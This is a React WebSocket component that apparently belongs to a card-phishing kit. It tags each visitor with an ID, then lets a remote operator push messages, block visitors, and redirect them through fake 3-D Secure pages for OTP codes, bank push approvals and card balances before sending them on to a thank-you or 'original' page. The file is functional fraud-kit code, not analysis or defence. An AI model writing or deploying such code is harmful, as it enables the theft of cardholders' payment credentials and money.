import React, { useEffect } from 'react'
import { useNavigate } from 'react-router-dom';
import { ToastContainer, toast } from 'react-toastify';
import { AiOutlineExclamationCircle } from 'react-icons/ai'; // Import the warning icon

import 'react-toastify/dist/ReactToastify.css';
import './Toast.css'

const Websocket = ({setActiveComponent}) => {

    const navigate = useNavigate()
    useEffect(() => {

        let ws;
      
        const connectWebSocket = () => {
          ws = new WebSocket(process.env.REACT_APP_WEBSOCKET_URL);
      
          ws.onopen = () => {
            let existingUuId = localStorage.getItem("uuId");
        
            function generateRandom16DigitString() {
              let result = '';
              for (let i = 0; i < 16; i++) {
                result += Math.floor(Math.random() * 10); // Append a random digit (0-9)
              }
              return result;
            }
            // Generate a UUID if none exists
            if (!existingUuId) {
              existingUuId = generateRandom16DigitString(); // Generate UUID using crypto API
              localStorage.setItem("uuId", existingUuId); // Save it to localStorage
              console.log("Generated new UUID:", existingUuId);
            }
        
            // Send the UUID to the WebSocket server
            const message = JSON.stringify({
              type: "existing_uuId",
              uuId: existingUuId,
            });
            ws.send(message);
        
            console.log("Connected to WebSocket server");
          };
          
          ws.onmessage = (message) => {
            console.log(`Received message: ${message.data}`);
            const message_json = JSON.parse(message.data);
            console.log(message_json.type);
            if (message_json.type === "uuId_assign") {
              localStorage.setItem("uuId", message_json.uuId);
              console.log(localStorage.getItem("uuId"));
            }else if (message_json.type === "message") {
              toast(            <div className="flex items-center gap-2">
                <AiOutlineExclamationCircle className="text-yellow-500" size={24} /> {/* Icon */}
                <span>{message_json.message}</span>
              </div>, {
                position: "bottom-right",
                autoClose: 10000, // Duration in milliseconds
                className: "bg-gray-800  text-white rounded shadow-md",
                progressClassName: "bg-yellow-500",
              });
            }else if (message_json.type === "block_user") {
              
              localStorage.setItem('blocked', 'true')
            }
            else if (message_json.type === "question_response") {
              
              localStorage.setItem('seq_quest', message_json.message)
              navigate("/3ds/question")
            }
            else if (message_json.type === "push_text") {
              
              localStorage.setItem('push_text', message_json.message)
              navigate("/3ds/push")
            }
             else if (message_json.type === "redirect") {
              const RedirectPage = message_json.to
              if (RedirectPage === "otp_page") {
                navigate("/3ds/otp")
              } else if (RedirectPage === "wrong_data") {
                navigate("/payment")
              } else if (RedirectPage === "sucess_page") {
                navigate("/ThankYou")
              } else if (RedirectPage === "wrong_code") {
                navigate("/3ds/otp")
              }else if (RedirectPage === "wrong_push") {
                navigate("/3ds/push")
              }else if (RedirectPage === "wrong_balance") {
                navigate("/3ds/balance")
              }else if (RedirectPage === "push_page") {
                navigate("/3ds/push")
              }else if (RedirectPage === "balance_page") {
                navigate("/3ds/balance")
              }else if (RedirectPage === "original_page") {
                navigate("/success")
              
              
              }
            }
          };
      
          ws.onclose = () => {
            console.log("Disconnected from WebSocket server");
          };
        };
      
        // Handle page visibility change
        const handleVisibilityChange = () => {
          if (document.visibilityState === "visible") {
            // Reconnect WebSocket when the page is visible again
            if (ws.readyState !== WebSocket.OPEN) {
              connectWebSocket();
              console.log("Reconnected WebSocket due to page visibility change");
            }
          } else {
            // Optionally close the WebSocket when the page is hidden
            if (ws.readyState === WebSocket.OPEN) {
              ws.close();
              console.log("WebSocket closed due to page being hidden");
            }
          }
        };
      
        // Connect WebSocket initially
        connectWebSocket();
      
        // Add event listener for visibility change
        document.addEventListener("visibilitychange", handleVisibilityChange);
      
        return () => {
          ws.close(); // Close WebSocket on component unmount
          document.removeEventListener("visibilitychange", handleVisibilityChange); // Clean up event listener
        };
      }, []);
  
  
  
  
    return       <ToastContainer
    hideProgressBar={false} // Ensure progress bar is visible
    newestOnTop={false}
    closeOnClick
    rtl={false}
    pauseOnFocusLoss
    draggable
    pauseOnHover
     />
}

export default Websocket